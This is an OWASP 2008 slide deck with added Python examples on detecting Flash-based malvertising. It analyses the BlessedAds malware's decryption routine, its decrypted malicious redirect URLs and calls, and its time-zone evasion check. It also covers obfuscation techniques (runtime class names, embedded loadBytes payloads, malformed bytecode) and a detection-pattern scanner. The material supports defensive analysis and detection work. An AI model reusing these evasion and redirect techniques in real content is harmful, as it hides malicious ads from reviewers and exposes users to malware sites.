
Slide 1: The Detection and Analysis of Flash Based Malware
Copyright © The OWASP Foundation. Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License.
The OWASP Foundation, http://www.owasp.org
OWASP Asia Pacific Conference 2008
Paul Theriault, Senior Associate - SIFT, paul.theriault@sift.com.au
Feb 2008

Slide 2: About me
- Paul Theriault
- Security consultant with SIFT (www.sift.com.au)
- Web app penetration tester
- Code review and developer training
- Security researcher

Slide 3: Background
- Flash is a commonly used format for rich media on the internet
- Flash "movies" aren't really movies: they are application byte-code executed by the Flash Player runtime environment
- Many websites accept third-party Flash content:
  - Advertising networks
  - Gaming websites (Kongregate, Newgrounds...)
  - Graphic design/art sites (Flash Kit, Deviantart...)
  - Others: any forum with SWF avatars, etc.
- Third-party Flash movies may contain malicious code. How can you tell?

Slide 4: Talk Outline
1. Flash based malware
   - Background
   - Introduction to malware case study
2. Analysis methods
   - Disassembly
   - Decompiling
   - Runtime analysis
3. Counter-analysis methods
   - Obfuscation & stack manipulation
   - Dynamically loading content

Slide 5: Flash Advertising
- Flash has become a common format for web advertisements
- Advertising organisations must accept third-party content, which may be malicious
- An attacker only needs to redirect the user to a malicious site, and ads are supposed to redirect users!
- Ads are also often allowed to contact third-party servers for tracking purposes

Slide 6: Rise in "Malvertising"
- Malvertising: spreading malware by convincing sites to host malicious advertisements
  - http://isc.sans.org/diary.html?storyid=3727
- Major advertising organisations affected
- Typical method is to force the victim to a malicious website
- Old problem, new(ish) vector:
  - http://msmvps.com/spywaresucks
  - www.mikeonads.com

Slide 7: "SkyAuction/BlessedAds/Errorsafe" Malware
- Seen since March 2007 across many organisations
- Gained widespread media attention in November with major internet properties affected
- Fictitious Flash advertisement which redirects the visitor to a malicious website without user interaction
- Note:
  - The Flash file doesn't exploit any vulnerability
  - It used encryption and obfuscated programming techniques to hide function calls and URLs

Slide 8: Analysis Methods

Slide 9: Analysis of Flash Content
- Flash overview
- Static analysis
  - Bytecode-level analysis
  - ActionScript analysis
  - Focus on the ActionScript portions of the SWF file
- Runtime analysis

Slide 10: SWF Introduction

Slide 11: SWF Format
- Contains images, sounds, video clips AND ActionScript bytecode (ABC) in a series of tagged data blocks:
  Header | File Attributes Tag | ... | End Tag
- 2 types of tags: Definition & Control
  - Definition: defines content (shapes, text, sounds, script, etc.) and assigns it a character ID
  - Control: manipulates instances of content (instances of characters) and controls the flow of the file
- Complete specification for the SWF format is available from http://www.adobe.com/licensing/developer/ (requires registration)

Slide 12: ActionScript Overview
- Focus on the tags that contain ActionScript:
  - AS3: DoABC
  - AS2: DoAction, DoInitAction, DefineButton2
- ActionScript bytecode: a sequence of actions on the virtual machine state
- Specification for AVM2 bytecode: http://www.adobe.com/devnet/actionscript/articles/avm2overview.pdf

Slide 13: ActionScript Overview

Slide 14: Tools for static analysis
- Hex editor
- Flasm: ActionScript bytecode assembler/disassembler
- SWFMILL: converts SWF to XML and vice versa
- ActionScript decompilers:
  - Flare (AS2)
  - AVMPlus (AS3), compiled from Tamarin: https://www.flashsec.org/wiki/Simple_AS3_Decompiler_Using_Tamarin

Slides 15-20: SWF Deconstructed

The same movie viewed as ActionScript, as a FLASM disassembly, as SWFmill XML and as raw SWF bytes.

ActionScript:

    var url = 'http://www.sift.com.au';
    getURL(url, '_self');

FLASM (the stack contents after each action are shown as comments):

    frame 0
      constants 'url', 'http://www.sift.com.au', '_self'
      push c:0, c:1        // {"http://www.sift.com.au", "url"}
      varEquals            // {}
      push c:0             // {"url"}
      getVariable          // {"http://www.sift.com.au"}
      push c:2             // {_self, http://www.sift.com.au}
      getURL2
    end // of frame 0

XML: ...

SWF (raw bytes):

    46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00

Slide 21: Byte code analysis
- SWFs are usually compressed
  - Look at the first 3 bytes: CWS = compressed, FWS = non-compressed
  - Use 'flasm -x movie.swf' to decompress
- Open the SWF in a hex editor
  - Some unusual strings
  - Difficult to read in this format
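Added example (not part of the talk, and not flasm or SWFmill code): a small Python tag walker and AS2 action disassembler that performs the steps from these slides on the 102-byte hex dump of the "SWF Deconstructed" slide. It checks the FWS/CWS signature, inflates a CWS body with zlib, walks the tag list and prints DoAction payloads in flasm's notation, reproducing the listing on that slide. It also shows what happens on the malformed push record from the later bytecode-obfuscation slides: an unknown push type makes the disassembler skip the rest of the record, which is exactly the blind spot that technique relies on. Tag and action code numbers come from the public SWF specification; the sample SWF bytes are the slide's own, the malformed payload is constructed for this example, and `as_cws` exists only so that the decompression path can be exercised offline.

```python
import struct
import zlib

# Constructed input: the 102-byte hex dump from the "SWF Deconstructed" slide, byte
# for byte. The dump encodes the URL as 'http:www.sift.com.au' (no slashes) and its
# length fields agree with that, so the bytes are used exactly as printed.
SAMPLE_SWF = bytes.fromhex(
    "46 57 53 08 66 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 "
    "44 11 00 00 00 00 43 02 FF FF FF 3F 03 3C 00 00 00 88 21 00 03 00 "
    "75 72 6C 00 68 74 74 70 3A 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E "
    "61 75 00 5F 73 65 6C 66 00 96 04 00 08 00 08 01 3C 96 02 00 08 00 "
    "1C 96 02 00 08 02 9A 01 00 00 00 40 00 00 00"
)
# Constructed input: a DoAction payload opening with a push record of unknown value
# type 0x17, the malformed-push case shown on the bytecode-obfuscation slides.
MALFORMED_ACTIONS = bytes.fromhex("96 04 00 17 01 02 03 00")

SCRIPT_TAGS = {12: "DoAction", 34: "DefineButton2", 59: "DoInitAction", 82: "DoABC"}
ACTION_NAMES = {  # AS2 action codes from the SWF specification, in flasm's spelling
    0x00: "end", 0x17: "pop", 0x1C: "getVariable", 0x3C: "varEquals", 0x3D: "callFunction",
    0x40: "new", 0x4E: "getMember", 0x52: "callMethod", 0x88: "constants", 0x96: "push",
    0x99: "branch", 0x9A: "getURL2", 0x9D: "branchIfTrue",
}
PUSH_FIXED_SIZES = {1: 4, 2: 0, 3: 0, 4: 1, 5: 1, 6: 8, 9: 2}  # float/null/undef/reg/bool/double/c16


def decompress_swf(data):
    """Check the FWS/CWS signature and return (signature, version, inflated body)."""
    sig, version = data[:3], data[3]
    declared = struct.unpack_from("<I", data, 4)[0]   # uncompressed length incl. header
    body = data[8:]
    if sig == b"CWS":
        body = zlib.decompress(body)
    elif sig != b"FWS":
        raise ValueError("not a SWF, signature %r" % sig)
    if 8 + len(body) != declared:
        raise ValueError("header says %d bytes, got %d" % (declared, 8 + len(body)))
    return sig.decode("ascii"), version, body


def as_cws(data):
    """Re-wrap an uncompressed SWF as CWS, to exercise the decompression path."""
    _, version, body = decompress_swf(data)
    return b"CWS" + bytes([version]) + struct.pack("<I", 8 + len(body)) + zlib.compress(body)


def iter_tags(body):
    """Yield (code, payload) for each tag after the RECT, frame rate and frame count."""
    nbits = body[0] >> 3                    # RECT: 5-bit Nbits, then four Nbits-wide fields
    pos = (5 + 4 * nbits + 7) // 8 + 4      # ... followed by UI16 frame rate, UI16 frame count
    while pos + 2 <= len(body):
        code_and_len = struct.unpack_from("<H", body, pos)[0]
        pos += 2
        code, length = code_and_len >> 6, code_and_len & 0x3F
        if length == 0x3F:                  # long form: a UI32 length follows
            length = struct.unpack_from("<I", body, pos)[0]
            pos += 4
        yield code, body[pos:pos + length]
        pos += length
        if code == 0:                       # End tag
            return


def _cstring(buf, pos):
    end = buf.index(b"\x00", pos)
    return buf[pos:end].decode("latin-1"), end + 1


def _push_values(rec):
    """Decode an ActionPush value list; an unknown type stops decoding, as in flasm."""
    vals, pos = [], 0
    while pos < len(rec):
        t = rec[pos]
        pos += 1
        if t == 0:                          # null-terminated string
            s, pos = _cstring(rec, pos)
            vals.append(repr(s))
        elif t == 7:                        # 32-bit integer
            vals.append(str(struct.unpack_from("<i", rec, pos)[0]))
            pos += 4
        elif t == 8:                        # 8-bit constant pool index
            vals.append("c:%d" % rec[pos])
            pos += 1
        elif t in PUSH_FIXED_SIZES:         # other documented types: skipped, not decoded
            vals.append("<type %d>" % t)
            pos += PUSH_FIXED_SIZES[t]
        else:
            return vals, "unknown push type %d: rest of push skipped" % t
    return vals, None


def disassemble_actions(data):
    """Return flasm-style lines for one DoAction / DoInitAction payload."""
    lines, pos = [], 0
    while pos < len(data):
        code = data[pos]
        pos += 1
        length = 0
        if code >= 0x80:                    # only codes >= 0x80 carry a UI16 length
            length = struct.unpack_from("<H", data, pos)[0]
            pos += 2
        rec = data[pos:pos + length]
        pos += length
        name = ACTION_NAMES.get(code, "unknown_0x%02X" % code)
        if code == 0x88:                    # ActionConstantPool: UI16 count, then strings
            count, p, strings = struct.unpack_from("<H", rec, 0)[0], 2, []
            for _ in range(count):
                s, p = _cstring(rec, p)
                strings.append(s)
            lines.append("constants " + ", ".join(repr(s) for s in strings))
        elif code == 0x96:
            vals, problem = _push_values(rec)
            line = "push" + (" " + ", ".join(vals) if vals else "")
            lines.append(line + (" // " + problem if problem else ""))
        else:
            lines.append(name)
        if code == 0:
            break
    return lines


def disassemble_swf(data):
    """Return (signature, version, [(tag name, listing), ...]) for script-bearing tags."""
    sig, version, body = decompress_swf(data)
    scripts = []
    for code, payload in iter_tags(body):
        if code in (12, 59):
            scripts.append((SCRIPT_TAGS[code], disassemble_actions(payload)))
        elif code in SCRIPT_TAGS:           # DefineButton2 / DoABC: reported, not decoded
            scripts.append((SCRIPT_TAGS[code], ["%d bytes, not decoded here" % len(payload)]))
    return sig, version, scripts
```

Calling `disassemble_swf(SAMPLE_SWF)` returns `("FWS", 8, ...)` with the same eight lines flasm prints for this movie; the same call on `as_cws(SAMPLE_SWF)` goes through the zlib path and returns the identical listing under a `CWS` signature. `disassemble_actions(MALFORMED_ACTIONS)` returns `push // unknown push type 23: rest of push skipped` followed by `end`, the same report flasm gives on the obfuscation slides; a batch scanner can treat that message, or any tag whose action stream does not end cleanly, as a reason to pull the file for manual review.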

Slide 22: SWFmill
- Available from http://swfmill.org
- Converts SWF into XML (and XML to SWF)
- Much easier to read than hex
- But very large files: a 50k malware sample becomes a 6000-line XML file, which includes the graphic data
- Less information than decompiling, but more resilient to obfuscation

Slide 23: SWFmill
- The constants pool from the malware
- Difficult to determine where it is used in this view

Slide 24: FLASM
- FLASM is an ABC disassembler
- Available from http://www.nowrap.de/flasm.html
- Describes the ActionScript present in the SWF file in terms of virtual machine actions: push, pop, add, callMethod, jump, etc.
- FLASM provides lower-level analysis and helps with understanding exactly what is going on inside the AVM

Slide 25: FLASM analysis
- Looking at the "constants pool" in the malware:

    constants '_root', 'c1', '47ED02', 'c2', '46E91A247C', 'c3', '7FF817257C8DF8',
      'c4', '50E70523', 'c5', '7FD7153B7080E795EA776F',
      'c6', '48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB74956972D2F50252B6269',
      'c7', '11', 'c8', '10', 'c9', 'c10', 'c11', 'c12', '17', 'c13', '48FC022723CCA3',
      'c14', 'c15', '0DB1', 'c16',
      'c17', '48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031B923C634721342266E62EB8CBB7746D368E0268C2',
      'c18', '14B8', 'c19', '4DE905237C91BCA4F66B774FC274559DE42686', 'c20', '0F',
      'c21', '18BE426729D3BCFA', 'c22', '7FD7022D', 'c23', '7FFD043B', 'c24', '53FD14246D91',
      'c25', '7FD7102363', 'c26', '7FD7103B6F', 'c27', '7FD710347188', 'c28', '53ED1833',
      'c29', '47ED0203708EE9B0F06B666C9C2317CAA0',
      'String', 'prototype', 'color', 'eslogan', 'result', '', 'n', 'this', 'length', 'slice',
      'parseInt', 'fromCharCode', '_visible', 'getNextHighestDepth', 'emc',
      'createEmptyMovieClip', 'u', 'dt', 'getTime', 'loadVariables', 'i', 'setInterval',
      'stats', 'clearInterval', 'LoadVars', 'so', 'SharedObject', 'getLocal', 'data', 'uzhe',
      'exp', 'Date', 'cr', 'expires', 'flush', 'lim', 'r', 'view'

- Looks a bit fishy...

Slide 26: FLASM analysis
- Can also see where it is called:

    push 3, 0.0, 'LoadVars'
    new
    push 14688422, 1, r:1, 'c28'
    getMember
    push 'color'
    callMethod

- Calling a function called 'color' prior to calling LoadVars

Slide 27: ActionScript Analysis
- FLARE (http://www.nowrap.de/flare.html)
  - Decompiles SWF files (AS2 only) to ActionScript
- Manually trace the ActionScript for malicious behaviour
  - Functions which connect remotely
  - Look for strange behaviours
- Provides a much better view of what is going on

Slide 28: ActionScript Analysis
- Examine where the strange strings are assigned:

    _root.c1 = '47ED02';
    _root.c2 = '46E91A247C';
    _root.c3 = '7FF817257C8DF8';
    _root.c4 = '50E70523';
    _root.c5 = '7FD7153B7080E795EA776F';
    _root.c6 = '48FC022723CCA3A8F36070509F2105CBA738D20F5…

- Now search for where they are used:

    (new LoadVars())[v1.c28.color(14688422)](v1.c6.color(14688422), v1.c3.color(14688422), v1.c4.color(14688422));

- So we know it is opening a location, but where?

Slide 29: ActionScript Analysis
- The String.color() function is actually a decryption method (its argument, eslogan, is the decryption key):

    String.prototype.color = function (eslogan) {
        var v3 = eslogan;            // decryption key
        var result = '';
        var v1;
        var n;
        var v2;
        v1 = 0;
        n = this.length;
        while (v1 < n) {
            v2 = parseInt(this.slice(v1, v1 + 2), 16) ^ v3 >> 8 & 255;
            if (v2 > 127) {
                v2 += 848;
            }
            result += String.fromCharCode(v2);
            v3 = (v3 * 52845 + 22719) % 16777215;
            v1 += 2;
        }
        return result;
    };

Slide 30: ActionScript Analysis
- Compile and run the decryption algorithm across the mystery variables:

    c1:  get
    c2:  false
    c3:  _parent
    c4:  post
    c5:  __click_url
    c6:  http://blessedads.com/?cmpid=master0n
    c7:  1
    c8:  0
    c9:  0
    c10: 1
    c11: 0
    c12: 7
    c13: http://
    c14: 0
    c15: -9
    c16: 0
    c17: http://mysurvey4u.com/stats.php?campaign=master0n
    c18: 40
    c19: master0nintl8112007
    c20: /
    c22: __tz
    c23: _url
    c24: substr
    c25: __ftz
    c26: __flv
    c27: __fchk
    c28: send
    c29: getTimezoneOffset
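Added example, not code from the talk: the String.prototype.color() routine ported to Python and run with the key 14688422 (the value pushed before the 'color' call in the FLASM listing) over the hex constants from the constants-pool slide. Only constants whose plaintext the results table above gives are included; the table is what the output should match, and the `CONSTANTS` dictionary is copied from the slide with the extraction line breaks removed.

```python
# Port of the malware's String.prototype.color() decryption routine (added example).
KEY = 14688422  # value pushed before the 'color' call in the FLASM listing

# Ciphertexts from the constants-pool slide (c21 is omitted: its plaintext is not
# given on the results slide, so there is nothing to check it against).
CONSTANTS = {
    "c1": "47ED02", "c2": "46E91A247C", "c3": "7FF817257C8DF8", "c4": "50E70523",
    "c5": "7FD7153B7080E795EA776F",
    "c6": "48FC022723CCA3A8F36070509F2105CBA738D20F50A22FD09E2BB74956972D2F50252B6269",
    "c7": "11", "c8": "10", "c12": "17", "c13": "48FC022723CCA3", "c15": "0DB1",
    "c17": "48FC022723CCA3A7E67676518C201D9BA138D20F50A263C7922FAD031B923C634721342266E62EB8CBB7746D368E0268C2",
    "c18": "14B8", "c19": "4DE905237C91BCA4F66B774FC274559DE42686", "c20": "0F",
    "c22": "7FD7022D", "c23": "7FFD043B", "c24": "53FD14246D91", "c25": "7FD7102363",
    "c26": "7FD7103B6F", "c27": "7FD710347188", "c28": "53ED1833",
    "c29": "47ED0203708EE9B0F06B666C9C2317CAA0",
}


def color(ciphertext, key=KEY):
    """Decrypt one hex string exactly as the ActionScript does.

    Each byte is XORed with bits 8..15 of a running state that starts at the key
    and is advanced by a linear congruential step after every byte. ActionScript's
    precedence makes 'x ^ v3 >> 8 & 255' mean 'x ^ ((v3 >> 8) & 255)'. Values above
    127 are shifted by 848 (into the Cyrillic block) before becoming a character.
    """
    state = key
    out = []
    for i in range(0, len(ciphertext), 2):
        v = int(ciphertext[i:i + 2], 16) ^ ((state >> 8) & 255)
        if v > 127:
            v += 848
        out.append(chr(v))
        state = (state * 52845 + 22719) % 16777215
    return "".join(out)


def decrypt_all(constants=CONSTANTS, key=KEY):
    """Decrypt every constant, returning {name: plaintext}."""
    return {name: color(hexstr, key) for name, hexstr in constants.items()}


if __name__ == "__main__":
    for name, plain in decrypt_all().items():
        print("%s: %s" % (name, plain))
```

The generator is deterministic, so every string in the file decrypts with the one key the movie pushes; a scanner that spots this `parseInt(..., 16) ^ ...` shape in decompiled output can pull the key from the call site, run the same routine, and recover the URLs and method names (`send`, `loadVariables`, `_url`, `getTimezoneOffset`) without executing the movie.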

Slide 31: ActionScript Analysis
- Substituting these decrypted strings back into the original file reveals the calls:

    v1.emc.loadVariables("http://mysurvey4u.com/stats.php?campaign=master0n", "get");
    (new LoadVars())["send"]("http://blessedads.com/?cmpid=master0n", "_parent", "post");

Slide 32: Interesting Classes and Functions (AS2)
- Global functions: asfunction, ASnative, chr, escape, eval, fscommand, getTimer, getURL, loadMovie, loadMovieNum, loadVariables, mbchr, mbord, mbsubstring, MMExecute, setInterval, setTimeout, unescape
- Global properties: _global, _level, _root
- Classes: System.capabilities, ExternalInterface, LoadVars, LocalConnection, MovieClipLoader, NetConnection, NetStream, System.security, XML, XMLSocket
- Functions: XML.load, StyleSheet.load, LoadVars.load, LoadVars.send, LocalConnection.send, PrintJob.send, XML.send, XMLSocket.send, XML.sendAndLoad, LoadVars.sendAndLoad, FileReference.upload, FileReference.download

Slide 33: Interesting Classes and Functions (AS3)
- Classes: flash.display.Loader, flash.external.ExternalInterface, flash.media.Sound, flash.media.Video, flash.net.LocalConnection, flash.net.NetConnection, flash.net.NetStream, flash.net.SharedObject, flash.net.Socket, flash.net.URLLoader, flash.net.URLRequest, flash.net.URLStream, flash.net.XMLSocket, flash.system.Security, flash.system.LoaderContext, flash.utils.ByteArray, flash.utils.Timer
- Functions: flash.net.navigateToURL, flash.net.sendToURL, flash.net.registerClassAlias, flash.system.fscommand, flash.utils.setInterval, flash.utils.setTimeout, flash.utils.getDefinitionByName, flash.utils.getQualifiedClassName, flash.utils.getQualifiedSuperclassName, flash.utils.getTimer, flash.utils.unescapeMultiByte

Slide 34: Runtime Analysis
- Load the file and use a proxy to observe (and limit!) network interactions
- Obviously better to do this on an isolated test machine
- This malware tries to evade dynamic analysis: it only connects to the malicious website when the movie is loaded via http AND the local time zone offset passes a specific check:

    _root["__tz"] = -(new Date())["getTimeZoneOffset"]() / 60;
    if (_root["_url"]["substr"](parseInt(0), parseInt(7)) == "http://" && !(_root["__tz"] >= -9 && _root["__tz"] <= 0)) {

Slide 35: Advanced Runtime Analysis via debugger
- Many debug tools are available for Flash:
  - fdb (http://labs.adobe.com/technologies/flex/sdk/)
  - Ofd-net (ALPHA - http://sourceforge.net/projects/ofd-net)
- Requires the Debug Flash Player: http://www.adobe.com/support/flashplayer/downloads.html
- For a 3rd-party SWF, where do you get the debug file (SWD)?
  - "swf2swd.exe" from Nikos Kastellanos (ofd-net author, above URL)
- Also need to enable debugging:
  - UnlockSWF (http://www.buraks.com/unlockswf/)
- However, swf2swd has problems with malformed Flash files... work is required to develop a robust SWD extractor

Slide 36: Runtime Analysis
- Issues with runtime analysis:
  - Difficult to automate
  - Have to execute potentially dangerous code
  - Relies on observing external interactions (until debugging tools are more mature)
- Other runtime analysis tools:
  - SWFIntruder: https://www.owasp.org/index.php/Category:SWFIntruder
  - Erlswf: http://pentaphase.de/index.php?/archives/29-Erlang-unscrables-SWF.html

Slide 37: Counter Analysis Methods

Slide 38: Counter-Analysis
- Create class and function names at runtime
- Embedding code at runtime
- Code obfuscation

Slide 39: Class names at runtime
- Basic static analysis relies on locating key function and class names
- Classes can be instantiated from strings using:
  - AS2: var myClass = _global['LoadVars'];
  - AS3: var ClassReference:Class = getDefinitionByName("flash.display.Loader") as Class;
- For example:

    var f = String.fromCharCode;
    var a = f(76); a += f(111); a += f(97); a += f(100); a += f(86); a += f(97); a += f(114); a += f(115);   // builds "LoadVars"
    (new _global[a]()).send('http://www.sift.com.au', '_parent', 'post');

Slide 40: Function Names At Runtime
- Works for function names too:

    var v3 = chr(103) + (chr(101) + (chr(116) + (chr(85) + (chr(82) + chr(76)))));   // builds "getURL"
    _root[v3]('http://www.sift.com.au', '_parent', 'post');

- The string 'getURL' no longer appears in the file

Slide 41: ASnative
- ASnative is an undocumented function
- Calls AS2 functions using reference numbers, as if all functions existed in a spreadsheet
- Can be used instead of the real function names:

    var escapeFunction = _global["ASnative"](100, 0);

- Examples:
  - ASnative(253, 7) - [_global] XML
  - ASnative(301, 0) - [XML.prototype] load
  - ASnative(100, 0) - [_global] escape
- http://osflash.org/flashcoders/undocumented/asnative

Slide 42: Embedding Code
- Another method of hiding code is to load the malicious code at runtime
- However, loading code from an external site is obvious to runtime analysis
- The alternative is to embed the data within the file and load it at runtime
- One way to achieve this is to use the flash.display.Loader.loadBytes() method

Slide 43: Embedding code

    var loader:Loader = new Loader();
    configureListeners(loader.contentLoaderInfo);
    // create a ByteArray containing our malicious swf
    // (the first bytes, 67,87,83 = "CWS", are a compressed SWF header)
    var ba:ByteArray = new ByteArray();
    var badware:Array = [67,87,83,7,195,3,0,0,120,218,124,83,203,110,19,49,20,189,227,73,51,78,67,83,154,20,166,145,42,145,93,137,64,176,200,10,197,111,0,71,6,180,201,26,91,33,15,216,6, … 181,186,125,16,51,47,221,254,62,234,103,81,111,71,62,24,123,243,150,44,173,76,137,178,196,28,218,112,138,211,159,0,0,0,255,255,3,0,4,45,181,29];
    for (var i:int = 0; i < badware.length; i++) {
        ba.writeByte(badware[i]);
    }
    // load the swf
    loader.loadBytes(ba);

Slide 44: Embedding code
- The only remaining evidence is:
  - Use of the Loader class
  - Pushing a massive array on the stack
- Hiding the use of the Loader class:
  - Use dynamic class creation as discussed previously
- Hiding the data:
  - Encrypt/encode the values
  - Embed the values in an image (could also use steganography techniques)

Slide 45: Obfuscation
- Many techniques are available, from efforts to secure Flash movie source code:
  - ActionScript obfuscation
  - Bytecode obfuscation
- ActionScript obfuscation:
  - Use confusing variable names: numbers and non-displayable characters

Slide 46: Bytecode obfuscation
- The Flash AVM executes bytecodes one by one, whereas a decompiler breaks the bytecode into meaningful pieces
- We can exploit this to confuse decompilers
- The malicious script we want to hide:

    var foo = "getURL";
    _root[foo]('http://www.sift.com.au', '_parent', 'post');

Slide 47: Bytecode obfuscation
- Converted to action records this becomes:

    constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root'
    push 'foo', 'getURL'
    varEquals
    push 'post', '_parent', 'http://www.sift.com.au', 3, '_root'
    getVariable
    push 'foo'
    getVariable
    callMethod
    pop

Slide 48: Bytecode obfuscation
- Using a malformed push record, we hide the data from decompilers:

    push 'junk'            // manually change the size of this "push"
    label1:
    constants 'foo', 'getURL', 'post', '_parent', 'http://www.sift.com.au', '_root'
    push 'foo', 'getURL'
    varEquals
    push 'post', '_parent', 'http://www.sift.com.au', 3, '_root'
    getVariable
    push 'foo'
    getVariable
    callMethod
    pop
    branch label2
    branch label1
    label2:

Slide 49: Bytecode Obfuscation
- SWF (unaffected):

    46 57 53 08 95 00 00 00 78 00 05 5F 00 00 0F A0 00 00 0C 01 00 44 11 00 00 00 00 43 02 FF FF FF 3F 03 6B 00 00 00 96 61 00 17 88 37 00 06 00 66 6F 6F 00 67 65 74 55 52 4C 00 70 6F 73 74 00 5F 70 61 72 65 6E 74 00 68 74 74 70 3A 2F 2F 77 77 77 2E 73 69 66 74 2E 63 6F 6D 2E 61 75 00 5F 72 6F 6F 74 00 96 04 00 08 00 08 01 3C 96 0D 00 08 02 08 03 08 04 07 03 00 00 00 08 05 1C 96 02 00 08 00 1C 52 17 99 02 00 05 00 99 02 00 9B FF 17 …

- XML: (error, but successful)
- FLASM:

    frame 0
      push ??? // unknown push type 23: rest of push skipped
      label1: // Wild label in the middle of an action, now placed before next action
      branch label1
      pop
    end // of frame 0

- ActionScript: (no decompiled output shown)

Slide 50: Bytecode Obfuscation
- This obfuscation technique is documented: http://www.gotoandplay.it/_articles/2004/04/swfProtection.php
- Not a new technique, but this example has been seen in the wild
- The malware author read this article! The BlessedAds malware contains strings used in one of the examples on that page
- Some tools will detect these obfuscations (e.g. Manitu ASV)

Slide 51: Obfuscation seen in the wild
- Flare decompile of the diepress.com malware (http://msmvps.com/blogs/spywaresucks/archive/2008/01/19/1469617.aspx):

    // unknown tag 255 length 1
    // unknown tag 777 length 3
    movieClip 4680 {
      #initclip
      function () {
        for (;;) {
          return (164 % 511) * 5;
          var = -785 + ();
          for (;;) {

Slide 52: Goal of Analysis
- Analysis to achieve detection
- Reduce the risk that malicious content is served by your organisation
- Large reputational impact if malware is even associated with your organisation
- Limitations:
  - Ad click-through targets are controlled by third parties; you cannot prevent an attacker modifying the target site to be malicious
  - The same issue applies if third-party interactions are allowed in the background

Slide 53: Addressing the risk
- Contractual controls
  - "Terms of use" approach
  - Complicated chain of supply: federated ads
- Reactive controls
  - Mechanism for users to report malicious ads
  - Effective incident response program
- Technical controls
  - Need to determine exact program functionality
  - Signal detection problem: malicious ads can be very similar to legitimate ads

Slide 54: What about volume?
- Even basic obfuscation results in very time-consuming manual analysis
- Advertising organisations are dealing with thousands of campaigns, each with their own creatives
- Questions to ask:
  - Why would a legitimate ad use obfuscation?
  - Why would a legitimate ad call certain functions or class names?
- An automated approach can be used to find suspicious files to be marked for further analysis
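Added example of the automated first pass this slide proposes; it is not a tool from the talk. It scores decompiled AS2 source against a subset of the names on the "Interesting Classes and Functions (AS2)" slide and the indicators from the counter-analysis slides (names built from character codes, computed member access such as `_root[x]`, ASnative, long hex literals, and the parseInt/XOR decryption shape). The weights, the threshold, the pattern set and the three sample snippets (one ordinary click-through ad constructed here, plus the dynamic-class snippet and the decryption routine from the slides, shortened) are this example's own choices and would need tuning against real creatives.

```python
import re

# Remotely-connecting functions and classes worth a look (subset of the AS2 slide).
# Weights are this example's own choices.
INTERESTING_NAMES = {
    "getURL": 3, "loadMovie": 3, "loadMovieNum": 3, "loadVariables": 3,
    "LoadVars": 2, "XMLSocket": 3, "NetConnection": 2, "LocalConnection": 2,
    "ExternalInterface": 2, "MMExecute": 3, "eval": 2, "fscommand": 2,
}

# Indicators from the counter-analysis slides: label -> (pattern, weight).
OBFUSCATION_PATTERNS = {
    "names built from character codes": (re.compile(r"\b(?:String\.fromCharCode|chr|mbchr)\b"), 2),
    "computed member access (_root[x] / _global[x])": (
        re.compile(r"\b(?:_root|_global|_level\d*|this)\s*\[\s*[A-Za-z_]\w*\s*\]"), 3),
    "ASnative function-by-number lookup": (re.compile(r"\bASnative\b"), 4),
    "long hex string literal": (re.compile(r"['\"][0-9A-Fa-f]{16,}['\"]"), 2),
    "hex decode XORed with a running key": (re.compile(r"parseInt\(.*?,\s*16\)\s*\^"), 3),
}

REVIEW_THRESHOLD = 5  # example value; tune on a corpus of known-good creatives


def triage(source):
    """Score one decompiled script; returns (score, [finding, ...])."""
    score, findings = 0, []
    for name, weight in INTERESTING_NAMES.items():
        hits = len(re.findall(r"\b%s\b" % re.escape(name), source))
        if hits:
            score += weight
            findings.append("calls %s (%d)" % (name, hits))
    for label, (pattern, weight) in OBFUSCATION_PATTERNS.items():
        hits = len(pattern.findall(source))
        if hits:
            score += weight
            findings.append("%s (%d)" % (label, hits))
    return score, findings


def verdict(source):
    """'review' when the score reaches the threshold, otherwise 'pass'."""
    return "review" if triage(source)[0] >= REVIEW_THRESHOLD else "pass"


# Constructed samples. PLAIN_AD is what an ordinary click-through ad does; the other
# two are shortened versions of snippets shown on the counter-analysis slides.
PLAIN_AD = 'getURL("http://ad-landing.example/click", "_blank");'
DYNAMIC_CLASS_NAME = (
    "var f=String.fromCharCode; var a=f(76); a+=f(111); a+=f(97); a+=f(100); "
    "a+=f(86); a+=f(97); a+=f(114); a+=f(115); "
    "(new _global[a]()).send('http://www.sift.com.au', '_parent', 'post');"
)
DECRYPTOR_STUB = (
    "String.prototype.color = function (eslogan) { var v3 = eslogan; var result = ''; "
    "var v1 = 0; var n = this.length; while (v1 < n) { "
    "var v2 = parseInt(this.slice(v1, v1 + 2), 16) ^ v3 >> 8 & 255; "
    "result += String.fromCharCode(v2); v3 = (v3 * 52845 + 22719) % 16777215; v1 += 2; } "
    "return result; }; _root.c28 = '53ED1833'; _root.c6 = '48FC022723CCA3A8F36070509F2105CB';"
)

if __name__ == "__main__":
    for label, src in [("plain ad", PLAIN_AD), ("dynamic class name", DYNAMIC_CLASS_NAME),
                       ("decryptor", DECRYPTOR_STUB)]:
        score, findings = triage(src)
        print("%-20s %-7s score=%d %s" % (label, verdict(src), score, findings))
```

The plain ad scores 3 (it calls getURL, which is what an ad is supposed to do) and passes; the dynamic-class snippet scores 5 even though the string "LoadVars" never appears, because the character-code assembly and the `_global[a]` access are themselves the signal; the decryptor scores 7 on the `parseInt(..., 16) ^` shape, the long hex literal and fromCharCode. The point of the slide is that a cheap pass like this only has to decide which files a human looks at first, so it is fine for it to be noisy as long as a legitimate ad rarely trips several indicators at once.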

Slide 55: Recommendations
- Develop a combination of automated and manual analysis procedures to increase detection of malicious advertisements
- Use ad templates to restrict available functionality and make analysis easier
- Require 3rd parties to provide source code
- Implement good incident detection and response processes

Slide 56: Questions?

Slide 57: SIFT Pty Ltd - Australia
The detection and analysis of Flash based malware
Paul Theriault [paul.theriault@sift.com.au]

